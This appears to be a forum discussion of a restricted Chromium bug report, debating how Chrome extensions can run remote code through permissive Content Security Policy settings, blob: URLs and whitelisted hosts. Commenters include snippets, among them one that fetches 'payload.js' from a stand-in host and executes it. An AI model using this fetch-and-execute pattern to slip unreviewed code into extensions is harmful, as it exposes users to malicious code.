I deleted the tweets and Gist just out of respect for the Chromium people's decision to restrict the issue.
I personally don't see why this specific issue should be considered particularly severe, because the Chrome Web Store already allows extensions to execute remote code in extension context simply by declaring `unsafe-eval` or `unsafe-inline` (or specific remote hosts) in their content security policy -- and one can find such extensions quite easily.[1]
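For context, here's a minimal sketch of such a declaration under Manifest V2, where `content_security_policy` is a single string; the host is made up:

```json
{
  "manifest_version": 2,
  "name": "Hypothetical extension",
  "version": "1.0",
  "content_security_policy": "script-src 'self' 'unsafe-eval' https://cdn.example.com; object-src 'self'"
}
```

An extension shipping this can `eval()` arbitrary strings and load scripts from the whitelisted host, i.e. run code the store never reviewed.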
If the Chrome Web Store had a policy of "no remote code execution in extension context under any circumstance", then the issue would definitely have been high severity.
If this is as severe as I think it is, you may seriously want to consider taking down this link. Google and @gorhill have likely made things private for a reason.
Why? The model is wrong. There are always going to be severe bugs in deliberately complicated software. Hiding them behind terms that pretend the issue is about responsible disclosure is much more harmful in the long run because the real problem does not get fixed. Instead, due to a dependence on bad software, the problem can be used to attack speech.
Even without this issue, all Chrome extensions can execute code in their own context: by explicitly setting a `blob:` source in their `script-src` rather than relying on the default, by skipping the middle step and adding a domain they control to the `script-src` and linking a JavaScript file directly (why bother with blobs?), or simply by pushing a new version, which Chrome will automatically install for users. The title makes this issue sound severe, but it's just a missing best practice.
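To illustrate the blob route: assuming an extension whose CSP includes `script-src 'self' blob:`, an extension page could run remotely fetched code roughly like this (the URL is hypothetical):

```js
// Sketch: turn remotely fetched text into an executable script via a
// blob: URL, which a "script-src 'self' blob:" policy permits.
(async () => {
  const resp = await fetch('https://cdn.example.com/payload.js'); // hypothetical host
  const code = await resp.text();
  const blobUrl = URL.createObjectURL(new Blob([code], { type: 'text/javascript' }));
  const script = document.createElement('script');
  script.src = blobUrl; // served from blob:, so the CSP allows it
  document.head.appendChild(script);
})();
```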
I think "best practice" is a mistake in this context since it's an undocumented (?) change that has allowed malicious extensions to hide in plain sight - the default policy should not allow the naughty stuff they got up to, but it did because someone on the Chromium team weakened the security policy. Why audit for something that's impossible? (Obviously, thorough security screening WOULD audit for the impossible.)
This is worsened by the fact that the Chrome Web Store has near-zero security controls and no real review, so it's easy for malicious code to sneak into basically any high-install-count extension, especially if (as many extensions do) it requests lots of permissions it doesn't need.
Well, you can start by requiring extensions to actually request all the permissions they use. Chrome does that now, but its permissions are very coarse-grained, which makes it easier to hide malicious behavior -- and in this case the permission checks simply weren't working, so an extension could do something bad without holding the corresponding permission. The way extension permissions work in Chrome also means that extensions tend to request permissions they don't currently use, which lets them quietly pick up nasty behavior later on.
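As an illustration of how coarse those grants are, here's a hypothetical manifest fragment; `<all_urls>` alone lets the extension's content scripts read and modify every page the user visits:

```json
{
  "permissions": [
    "<all_urls>",
    "tabs",
    "webRequest",
    "storage"
  ]
}
```

Nothing in that list distinguishes the capabilities the extension exercises today from the ones it's merely reserving for later.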
In the end, an extension like Greasemonkey is implicitly unsafe because it's designed to run third-party code. You can't really fix that at the extension store/distribution level, so you put that dangerous footgun behind a permission and make sure users know what they're in for when installing it. I'm not sure what else you could really do, since Greasemonkey scripts rely on the ability to muck with page content.
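For what it's worth, the "behind a permission" part maps onto the optional-permissions API that already exists; a rough sketch (the element ID and wiring are made up):

```js
// Sketch: gate the userscript-style capability behind an optional
// permission. Requires "optional_permissions": ["<all_urls>"] in the
// manifest; chrome.permissions.request must run from a user gesture.
document.getElementById('enable-userscripts').addEventListener('click', () => {
  chrome.permissions.request({ origins: ['<all_urls>'] }, (granted) => {
    if (granted) {
      // Only now unlock the feature that injects user scripts into pages.
      console.log('User opted in to page modification.');
    }
  });
});
```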
I'm guessing this was quickly hidden by Google staff because of its severity? Unless it was released following responsible disclosure practices, in which case I don't know what I'm talking about.
Or it was one of those bug reports where the reporter made a normal thing sound dangerous. I remember one case where someone suggested that JS should be turned off by default because "arbitrary code execution" :)
Edit: with Chrome extensions, I can inject a script tag from any domain into any page. I used that to inject a library from CDN JS, but realized it was silly and imported the package instead.
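Roughly what that first attempt looks like from a content script (the library and version are just examples); note that a tag injected into the page DOM this way is still subject to the page's own CSP:

```js
// Sketch: a content script appending a <script> tag that pulls a
// library from a third-party CDN into the page.
const s = document.createElement('script');
s.src = 'https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.21/lodash.min.js';
document.documentElement.appendChild(s);
```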